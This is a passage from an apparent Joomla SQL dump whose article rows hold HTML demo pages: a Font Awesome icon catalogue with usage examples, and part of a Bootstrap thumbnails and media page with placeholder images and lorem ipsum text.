00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,8,'','',1,71,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(80,187,'Icons','icons','<h1 class=\"title\">Icons</h1>\r\n<h2>Font Awesome</h2>\r\n\r\n <p>Font Awesome is a pictographic language of web-related actions which delivers 220 icons. The Font Awesome webfont, CSS, and LESS files are licensed under CC BY 3.0 and you can find the full bs-examples of usage at <a href=\"http://fortawesome.github.com/Font-Awesome\" target=\"_blank\">Font Awesome - http://fortawesome.github.com/Font-Awesome</a></p>\r\n\r\n<p>Add <code>.icon-CLASS_NAME</code> to any element, best used with a <code><span></code>.</p>\r\n\r\n<div class=\"bs-example\">\r\n<h3>Web Icons</h3>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-adjust\"> icon-adjust</span><br /><br />\r\n <span class=\"icon-asterisk\"> icon-asterisk</span><br /><br />\r\n <span class=\"icon-ban-circle\"> icon-ban-circle</span><br /><br />\r\n <span class=\"icon-bar-chart\"> icon-bar-chart</span><br /><br />\r\n <span class=\"icon-barcode\"> icon-barcode</span><br /><br />\r\n <span class=\"icon-beaker\"> icon-beaker</span><br /><br />\r\n <span class=\"icon-bell\"> icon-bell</span><br /><br />\r\n <span class=\"icon-bolt\"> icon-bolt</span><br /><br />\r\n <span class=\"icon-book\"> icon-book</span><br /><br />\r\n <span class=\"icon-bookmark\"> icon-bookmark</span><br /><br />\r\n <span class=\"icon-bookmark-empty\"> icon-bookmark-empty</span><br /><br />\r\n <span class=\"icon-briefcase\"> icon-briefcase</span><br /><br />\r\n <span class=\"icon-bullhorn\"> icon-bullhorn</span><br /><br />\r\n <span class=\"icon-calendar\"> icon-calendar</span><br /><br />\r\n <span class=\"icon-camera\"> icon-camera</span><br /><br />\r\n <span class=\"icon-camera-retro\"> icon-camera-retro</span><br /><br />\r\n <span class=\"icon-certificate\"> icon-certificate</span><br /><br />\r\n <span class=\"icon-check\"> icon-check</span><br /><br />\r\n <span class=\"icon-check-empty\"> icon-check-empty</span><br /><br />\r\n <span class=\"icon-cloud\"> icon-cloud</span><br /><br />\r\n <span class=\"icon-cog\"> icon-cog</span><br /><br />\r\n <span class=\"icon-cogs\"> icon-cogs</span><br /><br />\r\n <span class=\"icon-comment\"> icon-comment</span><br /><br />\r\n <span class=\"icon-comment-alt\"> icon-comment-alt</span><br /><br />\r\n <span class=\"icon-comments\"> icon-comments</span><br /><br />\r\n <span class=\"icon-comments-alt\"> icon-comments-alt</span><br /><br />\r\n <span class=\"icon-credit-card\"> icon-credit-card</span><br /><br />\r\n <span class=\"icon-dashboard\"> icon-dashboard</span><br /><br />\r\n <span class=\"icon-download\"> icon-download</span><br /><br />\r\n <span class=\"icon-download-alt\"> icon-download-alt</span><br /><br />\r\n <span class=\"icon-edit\"> icon-edit</span><br /><br />\r\n <span class=\"icon-envelope\"> icon-envelope</span><br /><br />\r\n <span class=\"icon-envelope-alt\"> icon-envelope-alt</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-exclamation-sign\"> icon-exclamation-sign</span><br /><br />\r\n <span class=\"icon-external-link\"> icon-external-link</span><br /><br />\r\n <span class=\"icon-eye-close\"> icon-eye-close</span><br /><br />\r\n <span class=\"icon-eye-open\"> icon-eye-open</span><br /><br />\r\n <span class=\"icon-facetime-video\"> icon-facetime-video</span><br /><br />\r\n <span class=\"icon-film\"> icon-film</span><br /><br />\r\n <span class=\"icon-filter\"> icon-filter</span><br /><br />\r\n <span class=\"icon-fire\"> icon-fire</span><br /><br />\r\n <span class=\"icon-flag\"> icon-flag</span><br /><br />\r\n <span class=\"icon-folder-close\"> icon-folder-close</span><br /><br />\r\n <span class=\"icon-folder-open\"> icon-folder-open</span><br /><br />\r\n <span class=\"icon-gift\"> icon-gift</span><br /><br />\r\n <span class=\"icon-glass\"> icon-glass</span><br /><br />\r\n <span class=\"icon-globe\"> icon-globe</span><br /><br />\r\n <span class=\"icon-group\"> icon-group</span><br /><br />\r\n <span class=\"icon-hdd\"> icon-hdd</span><br /><br />\r\n <span class=\"icon-headphones\"> icon-headphones</span><br /><br />\r\n <span class=\"icon-heart\"> icon-heart</span><br /><br />\r\n <span class=\"icon-heart-empty\"> icon-heart-empty</span><br /><br />\r\n <span class=\"icon-home\"> icon-home</span><br /><br />\r\n <span class=\"icon-inbox\"> icon-inbox</span><br /><br />\r\n <span class=\"icon-info-sign\"> icon-info-sign</span><br /><br />\r\n <span class=\"icon-key\"> icon-key</span><br /><br />\r\n <span class=\"icon-leaf\"> icon-leaf</span><br /><br />\r\n <span class=\"icon-legal\"> icon-legal</span><br /><br />\r\n <span class=\"icon-lemon\"> icon-lemon</span><br /><br />\r\n <span class=\"icon-lock\"> icon-lock</span><br /><br />\r\n <span class=\"icon-unlock\"> icon-unlock</span><br /><br />\r\n <span class=\"icon-magic\"> icon-magic</span><br /><br />\r\n <span class=\"icon-magnet\"> icon-magnet</span><br /><br />\r\n <span class=\"icon-map-marker\"> icon-map-marker</span><br /><br />\r\n <span class=\"icon-minus\"> icon-minus</span><br /><br />\r\n <span class=\"icon-minus-sign\"> icon-minus-sign</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-money\"> icon-money</span><br /><br />\r\n <span class=\"icon-move\"> icon-move</span><br /><br />\r\n <span class=\"icon-music\"> icon-music</span><br /><br />\r\n <span class=\"icon-off\"> icon-off</span><br /><br />\r\n <span class=\"icon-ok\"> icon-ok</span><br /><br />\r\n <span class=\"icon-ok-circle\"> icon-ok-circle</span><br /><br />\r\n <span class=\"icon-ok-sign\"> icon-ok-sign</span><br /><br />\r\n <span class=\"icon-pencil\"> icon-pencil</span><br /><br />\r\n <span class=\"icon-picture\"> icon-picture</span><br /><br />\r\n <span class=\"icon-plane\"> icon-plane</span><br /><br />\r\n <span class=\"icon-plus\"> icon-plus</span><br /><br />\r\n <span class=\"icon-plus-sign\"> icon-plus-sign</span><br /><br />\r\n <span class=\"icon-print\"> icon-print</span><br /><br />\r\n <span class=\"icon-pushpin\"> icon-pushpin</span><br /><br />\r\n <span class=\"icon-qrcode\"> icon-qrcode</span><br /><br />\r\n <span class=\"icon-question-sign\"> icon-question-sign</span><br /><br />\r\n <span class=\"icon-random\"> icon-random</span><br /><br />\r\n <span class=\"icon-refresh\"> icon-refresh</span><br /><br />\r\n <span class=\"icon-remove\"> icon-remove</span><br /><br />\r\n <span class=\"icon-remove-circle\"> icon-remove-circle</span><br /><br />\r\n <span class=\"icon-remove-sign\"> icon-remove-sign</span><br /><br />\r\n <span class=\"icon-reorder\"> icon-reorder</span><br /><br />\r\n <span class=\"icon-resize-horizontal\"> icon-resize-horizontal</span><br /><br />\r\n <span class=\"icon-resize-vertical\"> icon-resize-vertical</span><br /><br />\r\n <span class=\"icon-retweet\"> icon-retweet</span><br /><br />\r\n <span class=\"icon-road\"> icon-road</span><br /><br />\r\n <span class=\"icon-rss\"> icon-rss</span><br /><br />\r\n <span class=\"icon-screenshot\"> icon-screenshot</span><br /><br />\r\n <span class=\"icon-search\"> icon-search</span><br /><br />\r\n <span class=\"icon-share\"> icon-share</span><br /><br />\r\n <span class=\"icon-share-alt\"> icon-share-alt</span><br /><br />\r\n <span class=\"icon-shopping-cart\"> icon-shopping-cart</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-signal\"> icon-signal</span><br /><br />\r\n <span class=\"icon-signin\"> icon-signin</span><br /><br />\r\n <span class=\"icon-signout\"> icon-signout</span><br /><br />\r\n <span class=\"icon-sitemap\"> icon-sitemap</span><br /><br />\r\n <span class=\"icon-sort\"> icon-sort</span><br /><br />\r\n <span class=\"icon-sort-down\"> icon-sort-down</span><br /><br />\r\n <span class=\"icon-sort-up\"> icon-sort-up</span><br /><br />\r\n <span class=\"icon-star\"> icon-star</span><br /><br />\r\n <span class=\"icon-star-empty\"> icon-star-empty</span><br /><br />\r\n <span class=\"icon-star-half\"> icon-star-half</span><br /><br />\r\n <span class=\"icon-tag\"> icon-tag</span><br /><br />\r\n <span class=\"icon-tags\"> icon-tags</span><br /><br />\r\n <span class=\"icon-tasks\"> icon-tasks</span><br /><br />\r\n <span class=\"icon-thumbs-down\"> icon-thumbs-down</span><br /><br />\r\n <span class=\"icon-thumbs-up\"> icon-thumbs-up</span><br /><br />\r\n <span class=\"icon-time\"> icon-time</span><br /><br />\r\n <span class=\"icon-tint\"> icon-tint</span><br /><br />\r\n <span class=\"icon-trash\"> icon-trash</span><br /><br />\r\n <span class=\"icon-trophy\"> icon-trophy</span><br /><br />\r\n <span class=\"icon-truck\"> icon-truck</span><br /><br />\r\n <span class=\"icon-umbrella\"> icon-umbrella</span><br /><br />\r\n <span class=\"icon-upload\"> icon-upload</span><br /><br />\r\n <span class=\"icon-upload-alt\"> icon-upload-alt</span><br /><br />\r\n <span class=\"icon-user\"> icon-user</span><br /><br />\r\n <span class=\"icon-user-md\"> icon-user-md</span><br /><br />\r\n <span class=\"icon-volume-off\"> icon-volume-off</span><br /><br />\r\n <span class=\"icon-volume-down\"> icon-volume-down</span><br /><br />\r\n <span class=\"icon-volume-up\"> icon-volume-up</span><br /><br />\r\n <span class=\"icon-warning-sign\"> icon-warning-sign</span><br /><br />\r\n <span class=\"icon-wrench\"> icon-wrench</span><br /><br />\r\n <span class=\"icon-zoom-in\"> icon-zoom-in</span><br /><br />\r\n <span class=\"icon-zoom-out\"> icon-zoom-out</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"clear\"></div>\r\n <div>\r\n <h3>Text Editor Icons</h3>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-file\"> icon-file</span><br /><br />\r\n <span class=\"icon-cut\"> icon-cut</span><br /><br />\r\n <span class=\"icon-copy\"> icon-copy</span><br /><br />\r\n <span class=\"icon-paste\"> icon-paste</span><br /><br />\r\n <span class=\"icon-save\"> icon-save</span><br /><br />\r\n <span class=\"icon-undo\"> icon-undo</span><br /><br />\r\n <span class=\"icon-repeat\"> icon-repeat</span><br /><br />\r\n <span class=\"icon-paper-clip\"> icon-paper-clip</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-text-height\"> icon-text-height</span><br /><br />\r\n <span class=\"icon-text-width\"> icon-text-width</span><br /><br />\r\n <span class=\"icon-align-left\"> icon-align-left</span><br /><br />\r\n <span class=\"icon-align-center\"> icon-align-center</span><br /><br />\r\n <span class=\"icon-align-right\"> icon-align-right</span><br /><br />\r\n <span class=\"icon-align-justify\"> icon-align-justify</span><br /><br />\r\n <span class=\"icon-indent-left\"> icon-indent-left</span><br /><br />\r\n <span class=\"icon-indent-right\"> icon-indent-right</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-font\"> icon-font</span><br /><br />\r\n <span class=\"icon-bold\"> icon-bold</span><br /><br />\r\n <span class=\"icon-italic\"> icon-italic</span><br /><br />\r\n <span class=\"icon-strikethrough\"> icon-strikethrough</span><br /><br />\r\n <span class=\"icon-underline\"> icon-underline</span><br /><br />\r\n <span class=\"icon-link\"> icon-link</span><br /><br />\r\n <span class=\"icon-columns\"> icon-columns</span><br /><br />\r\n <span class=\"icon-table\"> icon-table</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-th-large\"> icon-th-large</span><br /><br />\r\n <span class=\"icon-th\"> icon-th</span><br /><br />\r\n <span class=\"icon-th-list\"> icon-th-list</span><br /><br />\r\n <span class=\"icon-list\"> icon-list</span><br /><br />\r\n <span class=\"icon-list-ol\"> icon-list-ol</span><br /><br />\r\n <span class=\"icon-list-ul\"> icon-list-ul</span><br /><br />\r\n <span class=\"icon-list-alt\"> icon-list-alt</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"clear\"></div>\r\n <div>\r\n <h3>Directional Icons</h3>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-arrow-down\"> icon-arrow-down</span><br /><br />\r\n <span class=\"icon-arrow-left\"> icon-arrow-left</span><br /><br />\r\n <span class=\"icon-arrow-right\"> icon-arrow-right</span><br /><br />\r\n <span class=\"icon-arrow-up\"> icon-arrow-up</span><br /><br />\r\n <span class=\"icon-chevron-down\"> icon-chevron-down</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-circle-arrow-down\"> icon-circle-arrow-down</span><br /><br />\r\n <span class=\"icon-circle-arrow-left\"> icon-circle-arrow-left</span><br /><br />\r\n <span class=\"icon-circle-arrow-right\"> icon-circle-arrow-right</span><br /><br />\r\n <span class=\"icon-circle-arrow-up\"> icon-circle-arrow-up</span><br /><br />\r\n <span class=\"icon-chevron-left\"> icon-chevron-left</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-caret-down\"> icon-caret-down</span><br /><br />\r\n <span class=\"icon-caret-left\"> icon-caret-left</span><br /><br />\r\n <span class=\"icon-caret-right\"> icon-caret-right</span><br /><br />\r\n <span class=\"icon-caret-up\"> icon-caret-up</span><br /><br />\r\n <span class=\"icon-chevron-right\"> icon-chevron-right</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-hand-down\"> icon-hand-down</span><br /><br />\r\n <span class=\"icon-hand-left\"> icon-hand-left</span><br /><br />\r\n <span class=\"icon-hand-right\"> icon-hand-right</span><br /><br />\r\n <span class=\"icon-hand-up\"> icon-hand-up</span><br /><br />\r\n <span class=\"icon-chevron-up\"> icon-chevron-up</span><br /><br />\r\n </div>\r\n </div>\r\n<div class=\"clear\"></div>\r\n <div>\r\n <h3>Video Player Icons</h3>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-play-circle\"> icon-play-circle</span><br /><br />\r\n <span class=\"icon-play\"> icon-play</span><br /><br />\r\n <span class=\"icon-pause\"> icon-pause</span><br /><br />\r\n <span class=\"icon-stop\"> icon-stop</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-step-backward\"> icon-step-backward</span><br /><br />\r\n <span class=\"icon-fast-backward\"> icon-fast-backward</span><br /><br />\r\n <span class=\"icon-backward\"> icon-backward</span><br /><br />\r\n <span class=\"icon-forward\"> icon-forward</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-fast-forward\"> icon-fast-forward</span><br /><br />\r\n <span class=\"icon-step-forward\"> icon-step-forward</span><br /><br />\r\n <span class=\"icon-eject\"> icon-eject</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-fullscreen\"> icon-fullscreen</span><br /><br />\r\n <span class=\"icon-resize-full\"> icon-resize-full</span><br /><br />\r\n <span class=\"icon-resize-small\"> icon-resize-small</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"clear\"></div>\r\n <div>\r\n <h3>Social Icons</h3>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-phone\"> icon-phone</span><br /><br />\r\n <span class=\"icon-phone-sign\"> icon-phone-sign</span><br /><br />\r\n <span class=\"icon-facebook\"> icon-facebook</span><br /><br />\r\n <span class=\"icon-facebook-sign\"> icon-facebook-sign</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-twitter\"> icon-twitter</span><br /><br />\r\n <span class=\"icon-twitter-sign\"> icon-twitter-sign</span><br /><br />\r\n <span class=\"icon-github\"> icon-github</span><br /><br />\r\n <span class=\"icon-github-sign\"> icon-github-sign</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-linkedin\"> icon-linkedin</span><br /><br />\r\n <span class=\"icon-linkedin-sign\"> icon-linkedin-sign</span><br /><br />\r\n <span class=\"icon-pinterest\"> icon-pinterest</span><br /><br />\r\n <span class=\"icon-pinterest-sign\"> icon-pinterest-sign</span><br /><br />\r\n </div>\r\n </div>\r\n <div class=\"width-25 width-block\">\r\n <div class=\"pull-left\">\r\n <span class=\"icon-google-plus\"> icon-google-plus</span><br /><br />\r\n <span class=\"icon-google-plus-sign\"> icon-google-plus-sign</span><br /><br />\r\n <span class=\"icon-sign-blank\"> icon-sign-blank</span><br /><br />\r\n </div>\r\n </div>\r\n<div class=\"clear\"></div>\r\n</div>\r\n<pre class=\"prettyprint linenums\"><span class=\"icon-CLASS_NAME\">\r\n ...\r\n</span>\r\n<span class=\"icon-download\">\r\n ...\r\n</span></pre>\r\n<hr />\r\n<section id=\"examples\">\r\n <h2>More Examples</h2>\r\n <p>Many examples re-used from the Twitter Bootstrap documentation.</p>\r\n <div class=\"row\">\r\n <div class=\"width-33 width-block\">\r\n <div class=\"pull-left\">\r\n <div class=\"well\">\r\n <p>Use Font Awesome icons in:</p>\r\n <ul class=\"icons\">\r\n <li><i class=\"icon-ok\"></i>Bulleted lists (like this one)</li>\r\n <li><i class=\"icon-ok\"></i>Buttons</li>\r\n <li><i class=\"icon-ok\"></i>Button groups</li>\r\n <li><i class=\"icon-ok\"></i>Navigation</li>\r\n <li><i class=\"icon-ok\"></i>Prepended form inputs</li>\r\n <li><i class=\"icon-ok\"></i>And many more with Custom CSS</li>\r\n </ul>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"width-33 width-block\">\r\n <div class=\"pull-left\">\r\n <p>\r\n <a class=\"btn\" href=\"#\"><i class=\"icon-refresh\"></i> Refresh</a>\r\n <a class=\"btn btn-success\" href=\"#\"><i class=\"icon-shopping-cart icon-large\"></i> Checkout</a>\r\n <a class=\"btn btn-danger\" href=\"#\"><i class=\"icon-trash icon-large\"></i> Delete</a>\r\n </p>\r\n <p>\r\n <a class=\"btn btn-large btn-primary\" href=\"#\"><i class=\"icon-comment\"></i> Comment</a>\r\n <a class=\"btn btn-small\" href=\"#\"><i class=\"icon-cog\"></i> Settings</a>\r\n <a class=\"btn btn-small btn-info\" href=\"#\"><i class=\"icon-info-sign\"></i> More Info</a>\r\n </p>\r\n <div class=\"well\" style=\"padding: 8px 0;\">\r\n <ul class=\"nav nav-list\">\r\n <li class=\"active\"><a href=\"#\"><i class=\"icon-home\"></i> Home</a></li>\r\n <li><a href=\"#\"><i class=\"icon-book\"></i> Library</a></li>\r\n <li><a href=\"#\"><i class=\"icon-pencil\"></i> Applications</a></li>\r\n <li><a href=\"#\"><i class=\"icon-cogs\"></i> Settings</a></li>\r\n </ul>\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"width-33 width-block\">\r\n <div class=\"pull-left\">\r\n <div class=\"btn-toolbar\">\r\n <div class=\"btn-group\">\r\n <a class=\"btn\" href=\"#\"><i class=\"icon-align-left\"></i></a>\r\n <a class=\"btn\" href=\"#\"><i class=\"icon-align-center\"></i></a>\r\n <a class=\"btn\" href=\"#\"><i class=\"icon-align-right\"></i></a>\r\n <a class=\"btn\" href=\"#\"><i class=\"icon-align-justify\"></i></a>\r\n </div>\r\n <div class=\"btn-group\">\r\n <a class=\"btn btn-primary\" href=\"#\"><i class=\"icon-user\"></i> User</a>\r\n <a class=\"btn btn-primary dropdown-toggle\" data-toggle=\"dropdown\" href=\"#\"><span class=\"icon-caret-down\"></span></a>\r\n <ul class=\"dropdown-menu\">\r\n <li><a href=\"#\"><i class=\"icon-pencil\"></i> Edit</a></li>\r\n <li><a href=\"#\"><i class=\"icon-trash\"></i> Delete</a></li>\r\n <li><a href=\"#\"><i class=\"icon-ban-circle\"></i> Ban</a></li>\r\n <li class=\"divider\"></li>\r\n <li><a href=\"#\"><i class=\"i\"></i> Make admin</a></li>\r\n </ul>\r\n </div>\r\n </div>\r\n <form _lpchecked=\"1\">\r\n <div class=\"control-group\">\r\n <div class=\"controls\">\r\n <div class=\"input-prepend\">\r\n <span class=\"add-on\"><i class=\"icon-envelope\"></i></span>\r\n <input class=\"span2\" id=\"inputIcon\" type=\"text\" placeholder=\"Email address\" />\r\n </div>\r\n </div>\r\n </div>\r\n <div class=\"control-group\">\r\n <div class=\"controls\">\r\n <div class=\"input-prepend\">\r\n <span class=\"add-on\"><i class=\"icon-key\"></i></span>\r\n <input class=\"span2\" id=\"inputIcon2\" type=\"text\" placeholder=\"Password\" />\r\n </div>\r\n </div>\r\n </div>\r\n </form>\r\n <div>\r\n <span class=\"rating\">\r\n <span class=\"star\"></span><span class=\"star\"></span><span class=\"star\"></span><span class=\"star\"></span><span class=\"star\"></span>\r\n </span>\r\n </div>\r\n </div>\r\n </div>\r\n </div>\r\n</section>\r\n<hr />\r\n<h2>Code</h2>\r\n<section>\r\n <div class=\"width-30 width-block\">\r\n <div class=\"pull-left\">\r\n <h3>Inline Icon</h3>\r\n <p>Place Font Awesome icons just about anywhere with the <code><i></code> tag.</p>\r\n </div>\r\n </div>\r\n <div class=\"width-70 width-block\">\r\n <div class=\"pull-left\">\r\n <div class=\"well\">\r\n <div style=\"font-size: 24px;\">\r\n <i class=\"icon-camera-retro\"></i> icon-camera-retro\r\n </div>\r\n </div>\r\n <pre class=\"prettyprint linenums\">\r\n <div style=\"font-size: 24px;\">\r\n <i class=\"icon-camera-retro\"></i> icon-camera-retro\r\n </div>\r\n </pre>\r\n <div class=\"alert alert-info\"><i class=\"icon-info-sign\"></i> Icon classes are echoed via CSS :before.</div>\r\n <p>Increase the icon size by using the <code>icon-large</code> class. This increases the size by 33% relative to the font-size of the container.</p>\r\n <div class=\"well\">\r\n <div style=\"font-size: 24px;\">\r\n <i class=\"icon-camera-retro icon-large\"></i> icon-camera-retro\r\n </div>\r\n </div>\r\n <pre class=\"prettyprint linenums\">\r\n <div style=\"font-size: 24px;\">\r\n <i class=\"icon-camera-retro icon-large\"></i> icon-camera-retro\r\n </div>\r\n </pre>\r\n </div>\r\n </div>\r\n</section>\r\n\r\n','',1,78,'2012-11-18 14:40:48',736,'','2012-11-21 08:12:24',42,0,'0000-00-00 00:00:00','2012-11-18 14:40:48','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',12,9,'','',1,115,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(81,188,'Thumbnail & Media','thumbnail-media','<h1 class=\"title\">Thumbnails and Media</h1>\r\n\r\n <section id=\"images\">\r\n \r\n <h2>Images</h2>\r\n \r\n\r\n <p>Add classes to an <code><img></code> element to easily style images in any project.</p>\r\n <div class=\"bs-example bs-example-images\">\r\n <img src=\"http://placehold.it/140x140\" class=\"img-rounded\" />\r\n <img src=\"http://placehold.it/140x140\" class=\"img-circle\" />\r\n <img src=\"http://placehold.it/140x140\" class=\"img-polaroid\" />\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<img src=\"...\" class=\"img-rounded\">\r\n<img src=\"...\" class=\"img-circle\">\r\n<img src=\"...\" class=\"img-polaroid\">\r\n</pre>\r\n <p><span class=\"label label-info\">Heads up!</span> <code>.img-rounded</code> and <code>.img-circle</code> do not work in IE7-8 due to lack of <code>border-radius</code> support.</p>\r\n\r\n\r\n </section>\r\n\r\n \r\n <section id=\"thumbnails\">\r\n \r\n <h2>Thumbnails <small>Grids of images, videos, text, and more</small></h2>\r\n \r\n\r\n <h3>Default thumbnails</h3>\r\n <p>By default, Bootstrap\'s thumbnails are designed to showcase linked images with minimal required markup.</p>\r\n <div class=\"row-fluid\">\r\n <ul class=\"thumbnails\">\r\n <li class=\"grid3\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/260x180\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid3\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/260x180\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid3\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/260x180\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n <li class=\"grid3\">\r\n <div class=\"block\">\r\n <a href=\"#\" class=\"thumbnail\">\r\n <img src=\"http://placehold.it/260x180\" alt=\"\" />\r\n </a>\r\n </div>\r\n </li>\r\n </ul>\r\n </div>\r\n\r\n <h3>Highly customizable</h3>\r\n <p>With a bit of extra markup, it\'s possible to add any kind of HTML content like headings, paragraphs, or buttons into thumbnails.</p>\r\n <div class=\"row-fluid\">\r\n <ul class=\"thumbnails\">\r\n <li class=\"grid4\">\r\n <div class=\"thumbnail block\">\r\n <img src=\"http://placehold.it/300x200\" alt=\"\" />\r\n <div class=\"caption\">\r\n <h3>Thumbnail label</h3>\r\n <p>Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id elit.</p>\r\n <p><a href=\"#\" class=\"btn btn-primary\">Action</a> <a href=\"#\" class=\"btn\">Action</a></p>\r\n </div>\r\n </div>\r\n </li>\r\n <li class=\"grid4\">\r\n <div class=\"thumbnail block\">\r\n <img src=\"http://placehold.it/300x200\" alt=\"\" />\r\n <div class=\"caption\">\r\n <h3>Thumbnail label</h3>\r\n <p>Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id elit.</p>\r\n <p><a href=\"#\" class=\"btn btn-primary\">Action</a> <a href=\"#\" class=\"btn\">Action</a></p>\r\n </div>\r\n </div>\r\n </li>\r\n <li class=\"grid4\">\r\n <div class=\"thumbnail block\">\r\n <img src=\"http://placehold.it/300x200\" alt=\"\" />\r\n <div class=\"caption\">\r\n <h3>Thumbnail label</h3>\r\n <p>Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id elit.</p>\r\n <p><a href=\"#\" class=\"btn btn-primary\">Action</a> <a href=\"#\" class=\"btn\">Action</a></p>\r\n </div>\r\n </div>\r\n </li>\r\n </ul>\r\n </div>\r\n\r\n <h4>Why use thumbnails</h4>\r\n <p>Thumbnails (previously <code>.media-grid</code> up until v1.4) are great for grids of photos or videos, image search results, retail products, portfolios, and much more. They can be links or static content.</p>\r\n\r\n <h4>Simple, flexible markup</h4>\r\n <p>Thumbnail markup is simple—a <code>ul</code> with any number of <code>li</code> elements is all that is required. It\'s also super flexible, allowing for any type of content with just a bit more markup to wrap your contents.</p>\r\n\r\n <h4>Uses grid column sizes</h4>\r\n <p>Lastly, the thumbnails component uses existing grid system classes—like <code>.grid2</code> or <code>.grid3</code>—for control of thumbnail dimensions.</p>\r\n\r\n <h3>Markup</h2>\r\n <p>As mentioned previously, the required markup for thumbnails is light and straightforward. Here\'s a look at the default setup <strong>for linked 